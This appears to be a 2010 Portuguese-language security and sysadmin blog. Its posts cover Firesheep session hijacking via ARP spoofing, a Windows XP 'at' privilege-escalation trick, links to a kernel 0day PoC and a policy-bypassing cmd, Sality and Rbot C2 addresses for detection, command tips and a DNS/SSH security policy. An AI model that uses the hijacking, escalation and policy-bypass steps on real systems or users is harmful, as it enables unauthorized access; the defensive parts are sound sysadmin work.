terça-feira, 30 de novembro de 2010

HTTP session hijacking com o Firesheep

Firesheep é um plugin para o Firefox que realiza um ataque conhecido como HTTP session hijacking. Quando você loga em um site enviando seu nome de usuário e senha o servidor checa sua autenticação e se for um usuário autentico cria um cookie para o seu browser usar nas próximas requisições. O firesheep rouba essa sessão e usa para navegar como se fosse um usuário autentico.

Estive testando este plugin e funcionou direitinho. Em outro post vou mostrar como se usa o Hamster e o Ferret para fazer a mesma coisa que o firesheep, e ele vem com suporte para linux.

Como realizei os testes em uma rede cabeada tive que realizar um arpspoof primeiro, no meu caso usei o Cain&Abel. A máquina de teste foi um Windows XP. Queria testar no Linux mas o plugin não da suporte. Para testar usando uma rede sem fio você tem que ter um adaptador de rede que possa suportar o modo Monitor que é a mesma coisa que o modo promisc da rede cabeada.

Primeiramente você precisa do Firefox verão 3.6.12 ou mais nova. Depois baixe o firesheep aqui. Como não é um instalador você precisa fazer a instalação manualmente. Abra o Firefox e minimizar a janela, depois arraste o arquivo firesheep-0.1-1.xpi que você baixou do link acima para cima do Firefox, com isso o plugin será instalado.

Faça a instalação do WinPcap que é a biblioteca usada para manipular os pacotes capturados. Não se esqueça do Cain & Abel. Faça um ataque de arpspoof pelo Cain, se você não sabe como veja esse vídeo aqui. Abra seu Firefox, vá em Exibir > Painel >  Firesheep. Na aba que abrira lá em baixo tem 2 ícones, um deles mexe com as configurações do Firesheep, clique sobre ele e selecione sua placa de rede. Clique em “Start Capturing” e agora espere os ícones aparecerem dentro da aba do Firesheep.

by Osvaldo H Peixoto


segunda-feira, 29 de novembro de 2010

Elevando Privilégios Win Vista e 7 - 0day 24/11/2010


Nova vulnerabilidade no na API do Kernel do Windows Vista e 7 permite elevar privilégios no sistema. Para ler o post na integra acesse aqui. Tem também um vídeo demonstrando a técnica.

Para baixar o PoC clique aqui e depois de executar o programa é só executar o comando “whoami”.

By Osvaldo H Peixoto


Treinamento online e grátis da Offensive Security

O treinamento da Offensive Security um dos melhores cursos de segurança da informação é todo em cima do BackTrack, considerada a melhor distro de segurança do mercado.

Os cursos são um pouco caro, mas quem tem um dinheirinho extra vale a pena cada centavo investido.
Você pode também acessar a versão grátis online do curso aqui.

by Osvaldo H Peixoto


Detectando o Sality na rede

O Sality tem dado muita dor de cabeça para muitos Administradores de Rede. Neste post vou mostrar como detectar se alguma máquina da rede esta infectada com este vírus.
Este vírus tem vários apelidos, veja a figura abaixo:


Como parte de sua atividade de infecção ele tenta estabelecer algumas conexões nos IP´s e portas mostrado na figura abaixo:


Sabendo disso vamos acessar o Gateway da rede e rodar um tcpdump com a sintaxe abaixo:
#tcpdump -n -i any host 122.224.6.48 or host 173.192.153.178 or host 60.190.222.139 or host 64.79.73.154 or host 91.217.162.104 or host 91.217.162.178 or host 222.170.127.203

Com isso toda conexão que queira ser estabelecida nos IP´s acima serão detectados pelo tcpdump, assim podemos saber as máquinas da rede que possivelmente estão infectadas com o Sality.

by Osvaldo H Peixoto


Malware da Guerra do Rio

Hoje pela manhã recebi um email que chamou minha atenção. O Assunto da mensagem era “axei um video da invasao da favela no Rio !!!”. Tinha 3 links que apontavam para o mesmo domínio. Desconfiei por 3 motivos:

 

Primeiro motivo: todo assunto que é foco da mídia também se torna foco para os criadores desses malwares. Se você ver algo na mídia que esta sendo bem divulgado e você recebe um email que tem como assunto ou conteúdo o que a mídia esta expondo, desconfie.


Segundo motivo: como vimos no meu post “Como detectar um SPAM e/ou MALWARE?” sempre será enviado um link para que você realize o download do malware, com isso podendo burlar os filtros e antivírus de servidores de email. Neste caso não foi diferente, tinha 3 links para o mesmo local e o site era desconhecido.


Terceiro motivo: o cara escreve achei com “x”.

Veja abaixo a figura do email recebido:



Para testar meu Avast versão free edition tentei baixar este programa direto do link e para a minha felicidade meu Avast bloqueou. Estava com as definições de vírus de número 101129-0 no momento deste teste.
Como não queria desativar meu Avast para realizar este teste, resolvi realizar o teste em uma máquina virtual. Vamos ao que interessa.

Cliquei no link que veio no email e baixei um arquivo com extensão AVI porém nas propriedades do arquivo é identificado como “Proteção de tela”, veja a figura abaixo:




O próximo passo foi enviar o arquivo para o Anubis. Depois da analise foi detectado como sendo o Backdoor.Win32.Rbot:


 Depois de analisar o relatório do Anubis percebi que este vírus tenta realizar 4 conexões:

 

videosamaroes.zapto.org

www.originalgratis.com

www.perolasdoyoutube.com.br

187.17.96.21

 

Agora só é adicionar estes 3 domínios e o IP no firewall.

 

Como Administrador de Redes tenho a preocupação se os usuários da minha rede estão caindo em golpes como este, quando recebo estes email de certa forma fico feliz, porque posso analisar o email suspeito e tomar as providências necessárias para minimizar ao máximo o risco de meus usuários de serem afetados por estes malwares. Além de  adicionar estes IP´s no firewall é importante analisar se o antivírus da organização já reconhece este malware.


by Osvaldo H Peixoto


Encontre os Bugs do seu Browser

Estava procurando no baixaki um browser alternativo para determinadas ocasiões, foi quando conheci o Qualys BrowserCheck.Quero fazer um pequeno comentário sobre o browser que achei no baixaki e já estou testando é o Orca Browser, muito rápido e estabilidade aceitável.


Qualys BrowserCheck é uma ferramenta que busca por vulnerabilidade e falhas de segurança no seu browser e nos plugins também. Assim que a falha for descoberta ele lhe orienta como você deve proceder para corrigir a suposta falha. A figura abaixo mostra os browsers compatíveis:




Para maiores informações acesso o BrowserCheck FAQ.
Esta é a primeira vez que texto esta ferramenta que será instalada em forma de plugin no meu browser.


Vou realizar este teste em uma máquina virtual com Windows XP SP3, veja abaixo a versão do IE:



Para instalar o plugin abra o IE e acesse o site da Qualys aqui. Já começou bem. Como tenho uma versão muito antiga do IE ele já detectou isso pra mim e perguntou se queria instalar a versão mais atual do IE. Neste caso vou escolher a outra opção. Veja a figura abaixo:



Se eu tivesse a versão atual do IE ele iria mostrar a tela abaixo:



Clique em “Install Plugin”. Depois de instalado ele abre uma página com um botão de “Scan Now” como mostra a figura abaixo:



Depois de clicar em scan now ele mostra o resultado como mostra a figura abaixo:



No meu caso ele detectou 3 erros. Para corrigir o erro é só clicar em “Fix it” e você será direcionado para o site do desenvolvedor para baixar a ultima versão. Para o meu teste vou baixar direto do site da Microsoft a ultima versão do IE e depois irei executar o teste novamente.


Baixei a ultima versão do IE direto do site da Microsoft. Agora vamos realizar os testes novamente, veja o resultado abaixo:



Mesmo com a versão atual, baixada diretamente do site da Microsoft, encontramos falhas no IE8. Vou clicar em “Fix it” e ver qual patch ele ira sugerir:



Veja que o Security Update recomendado foi o KB2360131 que é um conjunto de atualizações para o IE8 discutido no Microsoft Security Bulletin MS10-071. No SecurityFocus um dos BID é o 43709. No CVS temos as seguintes referencias CVE-2010-0808, CVE-2010-3243, CVE-2010-3324 até 3331. Pegue alguns exploits pela Internet e teste, comece por aqui Pulog.


Utilizando a atualização Expressa do Windows temos na lista de recomendação o nosso patch como mostra a figura abaixo:



Depois de realizar essa atualização não tive mais problemas com esse alerta.
O Qualys BrowserCheck é muito bom naquilo que esta proposto a fazer, o grande problema é quando você tem um parque de máquinas muito grande, já pensou ter que realizar esse teste em 50 máquinas ou mais? Nestes casos é ideal a utilização de ferramentas como o Nessus.

by Osvaldo H Peixoto

sexta-feira, 26 de novembro de 2010

Conheça o Google Browser Size

Google Browser Size tem como meta lhe mostrar as áreas do seu site que são mais visadas pelos seus visitantes. Por exemplo, o contorno que indica 90% significa que 90% das pessoas que visitam o Google tem a sua janela do navegador aberta para este tamanho de tela ou menor.

Isso é útil para garantir que partes importantes das páginas vistas pelos visitantes são visíveis por um grande público. Na página de exemplo que você vê quando você visitar este site, há uma botão de "donate now" que esta dentro do contorno de 80%, o que significa que 20% dos usuários não podem ver este botão quando pela primeira vez visitar a página, 20% é um número significativo, sabendo deste fato seria interessante incentivar o designer a mover o botão mais para cima da página desta forma seria possível ver sem precisar do “scrolling”

Visite o Google Browser clicando aqui e coloque a URL do seu site. Veja a figura abaixo como exemplo:


by Osvaldo H Peixoto


Script para monitorar DNS

Segue abaixo o script chamado de nanny.pl. Ele monitora seu servidor DNS e se for preciso reinicia o mesmo. Segue abaixo o script ou faça o download do mesmo aqui.
Não esqueça de colocar no crontab para executar o scrip de tempos em tempos.

#!/usr/bin/perl
#
# Copyright (C) 2004  Internet Systems Consortium, Inc. ("ISC")
# Copyright (C) 2000, 2001  Internet Software Consortium.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS.  IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.

# $Id: nanny.pl,v 1.9 2004/03/05 05:04:27 marka Exp $

# A simple nanny to make sure named stays running.

$pid_file_location = '/var/run/named.pid';
$nameserver_location = 'localhost';
$dig_program = 'dig';
$named_program =  'named';

fork() && exit();

for (;;) {
 $pid = 0;
 open(FILE, $pid_file_location) || goto restart;
 $pid = ;
 close(FILE);
 chomp($pid);

 $res = kill 0, $pid;

 goto restart if ($res == 0);

 $dig_command =
        "$dig_program +short . \@$nameserver_location > /dev/null";
 $return = system($dig_command);
 goto restart if ($return == 9);

 sleep 30;
 next;

 restart:
 if ($pid != 0) {
  kill 15, $pid;
  sleep 30;
 }
 system ($named_program);
 sleep 120;
}
by Osvaldo H Peixoto

quinta-feira, 25 de novembro de 2010

Curso gratuito de Python

A Under-linux oferece esse curso gratuito de Python, muito bom para qualquer administrador de sistema Linux.

"Seja Bem vindo! Esse curso de Linguagem de Programação Python é Gratuito, e foi criado por um de nossos usuários do Portal under-Linux. O curso está aberto para todos os interessados. Mas para participar das aulas é preciso ter uma conta de usuário no Portal e ter efetuado o login. Somente como usuário registrado, você poderá deixar comentários para o professor em cada aula, além de poder contactá-lo pelo serviço de mensagens particulares entre os usuários do Under-Linux. Segue abaixo os links para todas as aulas do curso. Bom aprendizado!"

Clique aqui para acessar o curso.

by Osvaldo H Peixoto

Dicas para salvar a vida do Administrador de Redes

Como Administrador de Redes, especialmente em ambientes Linux, estamos constantemente nos deparando com situações em que o conhecimento do comando certo e a maneira correta de sua utilização pode salvar nosso dia e agilizar tarefas que antes seriam bem mais demorada sem a ferramenta e o conhecimento adequado.

Este é um post que constantemente estará atualizado, nele estarei colocando os comandos mais usados no dia a dia na administração e gerenciamento de máquinas rodando principalmente o sistema Linux, podendo haver também alguns comandos em Windows. Aqui você vai encontrar desde comandos simples como complexos, linha de comando simples e complexas, o que realmente importa é termos o conhecimento necessário para quando for preciso saber usar a ferramenta certa. Vou chamar este post de “Dicas Rápidas”, porque a idéia é justamente essa.

1) Este comando serve para filtrar as mensagens de erros dos logs. Customize conforme as mensagens do log que são geradas pelo serviço.

# egrep -i '(REJECT|WARNING|ERROR|FATAL|FAILURE|PANIC)' /var/log/auth.log

Nov 24 10:09:15 dunga su[22616]: pam_unix(su:auth): authentication failure; logname=ffsantos uid=1004 euid=0 tty=pts/0 ruser=ffsantos rhost=  user=root

2) Para resetar a senha do MySQL

- Pare o MySQL caso esteja sendo executado
- Inicie o daemon mysqld com o parâmetro --skip-grant-tables
- Inicie o cliente do MySQL  com os parâmetros “-u root”
- Execute o comando: UPDATE mysql.user SET PASSWORD=PASSWORD('novopassword') WHERE User='root';
- Execute o comando: FLUSH PRIVILEGES
- Pare o daemon mysqld e o inicie normalmente.

3) String para criar um dicionário para força bruta
Este comando pega um arquivo como entrada e cria um arquivo contendo uma palavra em cada linha

#cat arquivo_fonte.txt | awk '{FS= " "}{for(i=1;i dicionario.txt

4) Escalando privilégios no Windows XP

Abra um terminal (Iniciar > Executar > cmd > [ENTER])
c:\at
“access denied” error (não vai funcionar se der esse erro)

c:\at 21:01 /interactive “cmd.exe”  (mudar a hora)
depois da data setada vai surgir um shell

CTRL+ALT+DELETE depois kill explorer.exe

c:\explorer.exe

5) Usando o comando find

Encontrar os arquivos com SUID:
#find / -user root -perm -4000 -print 
ou
# find / ! -fstype proc -perm -4000 ! -type l -ls > saida_suid.log

Encontrar diretórios com SGID
#find / -group root -perm -2000 -print 
ou
#find / ! -fstype proc -perm -2000 ! -type l -ls > saida_sgid.log

Encontrar SUID e SGID
#find / -perm -4000 -o -perm -2000 -print

Encontrar arquivos e diretórios com permissão global de escrita
#find / ! -fstype proc -perm -2 ! -type l -ls > saida.log
ou
#find / -type f -perm -002 (para arquivo)
#find / -type d -perm -2 (para diretório)

Encontrar arquivos que não pertence a nenhum usuário e nem grupo
#find / \( -nouser -o -nogroup \)

Se você encontrar um SUID ou SGID não delete, crie um diretório dentro dos locais onde você encontrou o SUID ou SGID e mova os mesmos para lá, faça o procedimento abaixo:

#cd /usr/bin
#mkdir sguid
#chmod 700 sguid
#mv rcp rsh rlogin sperl5.6.1 off/.

6) Na distro Debian, você quer descobrir os serviços que estão sendo carregados no run level 2 com o boot do sistema
# ls -l /etc/rc2.d/S* | cut -d/ -f6

7) Deletando usuários suspeitos

Encontra todos os usuários válidos para o sistema
#egrep -v '.*:\*|:!' /etc/shadow |awk -F: '{print $1}'

Se você não reconhece o usuário, veja os arquivos que pertence a ele
#  find / -path /proc -prune -o -user -ls

Delete o usuário
#userdel -r nome_usuario

8) Mudando algumas flags de TCP/IP

#vim /etc/sysctl.conf
net.ipv4.tcp_syncookies = 1  (TCP SYN Cookie Protection)
net.ipv4.conf.all.accept_source_router = 0   (Disable IP Source Routing)
net.ipv4.conf.all.accept_redirects = 0  (Disable ICMP Redirect Acceptance)
net.ipv4.conf.all.rp_filter = 1  (IP Spoofing Protection)
net.ipv4.icmp_echo_ignore_broadcasts=1 (Ignoring Broadcasts Request)
net.ipv4.icmp_ignore_bogus_error_response = 1 (Bad Error Message Protection)

#sysctl -p

obs: alguns serviços sobre determinadas circunstancias recomendam não alterar algumas flags mencionadas acima

9) Se você não permite que os usuários do sistema monte (mount) e desmonte (umount) sistemas de arquivos, tire o SUID dos comandos mount e umount:

#chmod 755 /bin/mount /bin/umount


10) Descubra os serviços que estão sendo executados como root

# lsof -i | grep sshd
ou
#ps axl |grep httpd

Obs: somente o PPID 1 do serviço tem que rodar como root. Na saída do comando acima a segunda coluna é o UID do dono do processo, a terceira coluna o PID é o número de identificação do processo e a quarta coluna é o PPID que é o processo filho de um processo.

11) Comandos para testar open relay em servidores de email, também podem ser usados para depurar alguns problemas de envio de email

telnet www.organizacao.com.br
EHLO empresa.com.br
MAIL FROM: <fulano@empressa.com.br>
RCPT TO:<cliente@dominio.com.br>
DATA
.
QUIT

Para agilizar este processo crie um arquivo com o conteúdo acima
Salve o arquivo como teste_relay.txt

#type teste_relay.txt | nc -vv mail.openrelay.net 25

12) Encontre os arquivos que contenha uma palavra especifica

#find /etc -exec grep “root” {} -ls \;
#find / -type f -print0 | xargs -0 grep "palavra"
#grep -i palavra /diretorio/*
#find ./ -type f -print0 | xargs -0 grep "palavra"
#find /diretorio -type f -print0 | xargs -0 grep "palavra"

13) Mude uma palavra em vários arquivos de uma só vez, todo arquivo modificado será feito um backup

#for ARQ in *; do echo $ARQ; mv "$ARQ" "$ARQ.bak"; sed "s/textovelho/textonovo/g" "$ARQ.bak" > "$ARQ"; done
#find . -type f -exec bash -c 'echo "{}"; mv "{}" "{}.bak"; sed "s/textovelho/textonovo/g" "{}.bak" > "{}"' \;


14) Mude uma palavra dentro de um arquivo especifico

#sed "s/stringoriginal/stringtroca/g" arquivooriginal > arquivotroca

15) Mudando a data e hora no linux

#date -s 'mes/dia/ano 13:55'

16) Buscando por arquivos com base em seus tamanhos

#find . -size +1024 -exec ls -sh {} \; | sort -nr | head -n 20
#find . -size +1024k -print
#find . -size +1024 -print | xargs ls -lh
#find . -size +500M
#find . -size +1G
#find . -size +1G -exec ls -lh {} \;

17) Regra IPTABLES para barrar força bruta por sshd

#iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp --dport ssh -m recent --update --seconds 120 -j DROP
#iptables -A INPUT -p tcp --dport ssh --tcp-flags syn,ack,rst syn -m recent --set -j ACCEPT

18) Testando no DNS secundário transferência de zona (axfr) do DNS primário


#host -l -t any dominio.com.br
#dig @dns.dominio.com.br zonateste.com.br axfr

19) Comando netcat para pegar a versão do servidor web

#echo -e "GET / HTTP 1.0\r\n" | nc www.kernel.org 80 | egrep '^Server:'

20) Ver a versão do DNS bind

# dig @IP_SERVIDOR_DNS version.bind chaos txt

Obs: para que não apareça a versão do seu bind edite o arquivo /etc/bind/named.conf.options e adicione dento da sessão options a linha abaixo:

version "Nome da sua Empresa";

21) Fazer uma lista de serviços que estão rodando no sistema

#netstat -pn -l -A inet 
#lsof -i | grep LISTEN

22) Testando a blacklist e whitelist do SguidGuard

#echo "http://www.sitenalista.com 10.0.0.1/ - - GET" | squidGuard -c /etc/squid/squidGuard.conf -d


23) Monitorando qualquer serviço
este exemplo monitora o bind, colocar no cron para checar de tempos em tempos


service named status 2>&1 >> /dev/null || service named restart


24) Listar os IP´s conectados com o servidor com o número de conexões


netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
 
25) Editou um arquivo com o vi que não tem permissão de escrita, faça assim:
 
:w !sudo % tee 

by Osvaldo H Peixoto


quarta-feira, 24 de novembro de 2010

Burlando a Política do AD que não permite SHELL

Estou compartilhando com vocês um programa que usava na época da faculdade para poder ter acesso ao shell do Windows (cmd). Como todas as máquinas estavam no domínio do Windows 2003 herdávamos as políticas do Win 2003 e uma das políticas não permitia o acesso ao shell. Se você fizer uma pequena pesquisa no google você encontrara várias soluções para burlar essa política do AD do Windows.

No meu caso achei esse cmd hackeado que permitia abrir a shell na máquina windows que estivesse logado.
Baixe aqui o programa.

Ainda não testei no Windows 2008, por favor, se alguém puder testar e depois da um feedback agradeço desde já.

by Osvaldo H Peixoto

Exemplo de Política de Segurança para DNS e SSH

É muito importante e imprescindível a criação de uma Política de Segurança que atenda as necessidades da organização. Essa política vai estabelecer regras que devem ser obedecida por todos os usuários que estão envolvidos de forma direta ou indiretamente com o uso dos recursos da organização.

Com esta finalidade foi criado várias normas para nortear os interessados na criação de suas políticas. A grande dificuldade é saber por onde começar e qual seria a norma ideal para atender sua necessidade. Neste post irei mostrar uma política já implementada para os serviços DNS e SSH.

Segue abaixo três normas bem conhecidas:


Esta norma é um guia para o desenvolvimento de políticas de segurança para computadores e procedimentos para quem possui algum sistema na Internet.


Esta norma trata assuntos sobre segurança da informação, foi desenvolvida na Inglaterra pela Britishi Standard. Homologada pela ISO (Internacional Standardization Organization) no ano de 2000 como ISO/IEC 17799.


É um padrão de gestão de segurança de informação. Tem como objetivo ser usado junto com o ISO/IEC 17799.
Abaixo segue uma política de segurança adaptado para a empresa TECNEWS (fictícia) para os serviços DNS e SSH. Esta política teve como base a política implementada pela Universidade de São Paulo.

Norma para os Serviços de DNS

Introdução

Nesta norma estão definidas as diretrizes que devem ser observadas na utilização do DNS (Domain Name System) dentro da TECNEWS, principalmente no que se referem à sua implementação em servidores. Também são abordados alguns casos de utilização do DNS por parte dos usuários.

1. Objetivos

Esse documento tem como objetivo principal estabelecer diretrizes para uma boa utilização do DNS dentro da TECNEWS, tendo em vista a Política de Segurança vigente.

2. Abrangência

Em conformidade com a Política de Segurança, esta Norma tem abrangência em todo o backbone, sendo mandatória neste escopo.

3. Regras e Diretrizes Gerais

O DNS é um serviço coletivo e para que ele funcione a contento é necessário uma boa coordenação de todas as partes envolvidas.

Cabe aos Centros de Informática administrarem o domínio "tecnews.com.br" e seus subdomínios. Uma Unidade pode requerer o registro de um subdomínio e caso a Unidade deseje (e tenha competência para isso), pode passar a administrá-lo num servidor sob sua responsabilidade. Isso se chama delegação.

Não serão declarados equipamentos de outras redes nos servidores DNS da TECNEWS. Também não deverá haver registro de domínio "tecnews.com.br" em máquinas não pertencentes à TECNEWS.

A Resolução CCI 02 - "Normas para Registro de Sub-Domínios da TECNEWS" deve ser consultada. Para domínios não contidos nesta Resolução, a CCI deve ser consultada.

 3.1 Regras e Diretrizes Referentes ao Administrador

  3.1.1 Deveres

  •          Fornecer informações aos Usuários que permitam a configuração correta do DNS em seus computadores (quais servidores utilizar na resolução de nomes e que nome de domínio colocar).

  •         Manter o servidor de DNS configurado de forma correta e eficiente.

  •          Seguir recomendações dos Centros de Informática quanto à versão do servidor de DNS.

  •          Manter um "reverso" para todos os computadores pertencentes ao subdomínio sob sua responsabilidade.

  •          Comunicar ao Centro de Informática local as alterações que forem feitas na configuração das zonas (mudanças de IPs e nomes dos servidores DNS) dos subdomínios cuja responsabilidade lhe foi delegada.

  •          Manter o registro SOA corretamente configurado para o subdomínio, em relação aos parâmetros temporais e também ao endereço de e-mail para contato.

  •          Manter atualizados os Contatos Administrativo, Técnico e de Segurança pertinentes ao seu subdomínio, no sistema disponibilizado pelo CCE para essa finalidade (servidor WhoIs).

  •          Evitar a utilização de registros do tipo TXT ou HINFO, pois estes permitem que alguém obtenha de forma remota informações adicionais sobre os computadores da rede (fabricante do computador, sistema operacional instalado, etc.).

  •          Configurar seu servidor para limitar o número de computadores que tem permissão para fazer a leitura das zonas (transferência de zonas ou AXFR).

  •          Configurar seu servidor para que não seja possível fazer a leitura da versão instalada.

  •          Auxiliar a Unidade que deseje criar um subdomínio como proceder.

  •    Computadores que se utilizam de acesso remoto para se conectar a Universidade devem ter nomes que identifiquem claramente esse tipo de acesso, de preferência devem pertencer a um subdomínio reservado a essa finalidade. Isso facilita a criação de regras de bloqueio baseadas em nomes. Exemplos de nomes que podem ser utilizados: tty21.dialup.uspnet.usp.br, 54-45-107.143.dsl.ime.usp.br, etc.

 3.2 Regras para o Usuário

O Usuário deve configurar seu computador para que ele procure nomes em pelo menos dois servidores de DNS (primário e secundário).

Norma para os Serviços de SSH

Introdução

SSH ou Secure Shell é um conjunto de padrões e protocolos associados que permite estabelecer de forma remota um canal seguro, ou seja, criptografado, entre dois pontos de rede. Ele utiliza o sistema de chaves criptografadas públicas/privadas garantindo ainda maior segurança na hora da autenticação no login. 

A idéia do SSH é prover confidencialidade e integridade entre ambos os participantes do canal criado, permitindo assim maior segurança no acesso remoto ou na transferência de arquivos usando a ferramenta scp (linux). 

Este serviço permite que os usuários e administradores da TECNEWS possam ter maior segurança no seu acesso remoto ao console de sua máquina, em outras palavras, você estaria acessando a sua máquina como se estivesse na frente dela. 

O SSH é uma das formas mais seguras de acesso remoto e transferência de arquivos porque tudo é realizado de forma criptografada diferente de outros serviços similares como o TELNET e FTP.

1. Objetivos

Esta norma tem por objetivos:
  •          Fornecer os termos de utilização da ferramenta SSH;
  •          Estabelecer as responsabilidades dos administradores e usuários referentes ao uso do serviço.


2. Abrangência

Esta norma tem abrangência de toda a TECNEWS em Belém assim como suas filiais em Santarém e Marabá.

3. Considerações sobre o SSH

O SSH é uma ferramenta indispensável para qualquer rede que se preocupe com a segurança da informação e integridade dos seus dados, é indispensável à utilização desta ferramenta para todo e qualquer acesso ou transferência de arquivo de forma remota, deve-se sempre dar preferência ao seu uso em substituição aos tradicionais serviços TELNET e FTP.

Os seguintes programas podem ser utilizados de forma segura:

·         ssh ou putty.exe - semelhante ao TELNET, é usado para abrir sessão em computador remoto e executar comandos dentro do mesmo;
·         scp ou winscp.exe - utilitário para cópia remota de arquivos, do servidor para o cliente e vice-versa;
·         sftp ou winscp - realiza as mesmas tarefas que o FTP, com a diferença de ser criptografado.

4. Regras e Diretrizes para o usuário

Abaixo segue as regras que devem ser obedecidas pelos usuários que utilizaram o serviço SSH para garantir maior segurança e estabilidade do sistema:

  • Não divulgar nem emprestar sua senha
  • A senha é algo que você deve sempre lembrar e não deve ser escrita em papel e sim presente na sua mente; 
  • A senha é sensível ao maiúsculo e minúsculo, assim são senhas diferentes: tecnews, TECNEWS, Tecnews e TEcnews;
  • Nunca use o seu nome como senha, nomes de parentes, ou quaisquer outras coisas que estejam intrinsecamente ligadas a você (times de futebol, gostos pessoais, etc), pois examinando a sua vida é possível descobrir a sua senha;
  • A senha deve ser de difícil decodificação;
  • Jamais executar comandos que comprometam a segurança do sistema;
  • Não abandonar sessões abertas, lembre de fazer o logout;
  • Não fazer uso de programas que causem falhas no sistema operacional ou degradem sua desempenho;
  • Não tentar violar a segurança dos computadores ligados à rede (dentro e fora da TECNEWS);
  • Não tentar acesso não autorizado a computadores ou redes;
  • Não tentar violar arquivos pertencentes a outros usuários;
  • Recomenda-se que o usuário final não disponibilize serviço SSH em seus computadores pessoais, do contrário, fica ciente que deverá cumprir as regras impostas aos administradores de sistemas.

5. Regras e Diretrizes para o Administrador

É de total responsabilidade do administrador do serviço atentar de forma diligente para todas as regras abaixo descritas, é de suma importância o cumprimento delas:

  •         Sempre orientar e estimular os usuários a utilizarem o serviço SSH ao invés do TELNET, sempre que possível;
  •         Gerar as chaves dos usuários com senha;
  •         Implementar "chrooted sessions" para todos os usuários;
  •         Manter sempre o serviço SSH na sua ultima versão;
  •         Aplicar patches de segurança tanto no sistema como no serviço;
  •         Administrar o servidor SSH de modo a bloquear acessos a usuários e a grupos de usuários não autorizados;
  •         Não permitir a criação de arquivos ou habilitar comandos que possibilitem a execução remota de programas;
  •         Não permitir conexões remotas de usuários com permissões totais (root, supervisor ou administrador), sendo necessário todos os administradores depois de logados com os seus respectivos logins utilizar o comando su ou sudo para adquirir "poder" de root no sistema;
  •         Utilizar ferramentas e mecanismos que detectem ataques mais conhecidos contra SSH;
  •         Usar a opção de configuração do SSH "AllowUsers" para permitir apenas usuários autorizados;
  •         Não conceder acesso através de contas públicas (guest) ou sem senha;
  •         Não permitir acesso sem a utilização de chaves criptografadas;
  •         Monitorar os logs de acesso periodicamente verificando quais usuários estão acessando o servidor e, se porventura, estão executando comandos que normalmente não deveriam usar;
  •         Monitorar regularmente o sistema procurando arquivos que não possuem dono ou que não pertençam a nenhum grupo, que tenham permissão de escrita, alterando para somente leitura os que forem estranhos ou suspeitos;
  •         Manter os arquivos das áreas do administrador ou sistema invisíveis ou somente de leitura;
  •         Bloquear os serviços: netstat (tcp/15 - mostra informações sobre a conexão atual como endereços, dns, portas, etc), systat (tcp/11 - mostra os processos que estão sendo executados no servidor), finger (tcp/79 - apresenta informações completas de usuários como shells, diretórios, logins, etc);
  •         Consultar o Centro de Informática local em casos de dúvidas.


Este é um pequeno exemplo de uma política de segurança. Não importa de onde você pegar o modelo ou a norma, sempre adapte para a sua necessidade. A política sempre tem que ser refinada e aperfeiçoada para atender as necessidades da organização. Como boa prática a política tem que ser acessível para todos os usuários e de fácil entendimento. Sempre quando um novo funcionário for contratado apresente ao mesmo a política e faça que o mesmo assine um termo se responsabilizando por suas atividades na rede e uso dos recursos da organização.

by Osvaldo H Peixoto